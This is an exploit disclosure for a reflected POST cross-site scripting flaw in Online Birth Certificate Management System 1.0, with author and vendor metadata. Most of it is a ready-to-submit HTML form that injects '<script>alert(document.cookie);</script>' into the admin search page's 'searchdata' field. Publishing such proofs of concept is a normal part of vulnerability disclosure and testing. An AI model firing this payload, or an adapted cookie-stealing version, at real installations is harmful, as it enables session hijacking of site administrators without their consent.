Online Birth Certificate Management System 1.0 Cross Site Scripting

# Exploit Title: Online Birth Certificate Management System - Cross Site Scripting (XSS) Reflected POST# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0# no token in update profile admin<html>    <head>        <title> search recoder </title>    </head>    <body>        <form action="http://localhost/OBCMS/admin/search.php" method="post" enctype="multipart/form-data">            <input type="hidden" name="searchdata" value="<script>alert(document.cookie);</script>">            <button class="btn btn-sm btn-primary login-submit-cs" type="submit" name="search">search</button>        </form>    </body></html></html>